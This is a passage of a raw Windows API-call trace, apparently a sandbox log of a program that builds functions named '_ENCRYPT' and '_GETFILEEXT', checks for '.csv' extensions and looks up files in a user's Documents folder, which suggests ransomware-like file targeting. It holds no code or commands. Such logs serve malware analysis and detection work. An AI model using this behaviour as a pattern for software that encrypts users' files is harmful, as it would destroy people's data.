hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.180] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0177.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0177.181] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0177.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.182] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.182] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0177.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0177.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.183] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0177.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.183] CloseHandle (hObject=0x138) returned 1 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0177.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.184] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.185] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0177.185] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.185] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0177.185] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.185] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0177.185] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0177.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.186] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0177.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.186] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.186] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0x7a81de0, ftLastWriteTime.dwHighDateTime=0x1d5db81, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 0x90add8 [0177.188] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.188] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.188] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0x7a81de0, ftLastWriteTime.dwHighDateTime=0x1d5db81, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 0x90add8 [0177.189] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.189] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, 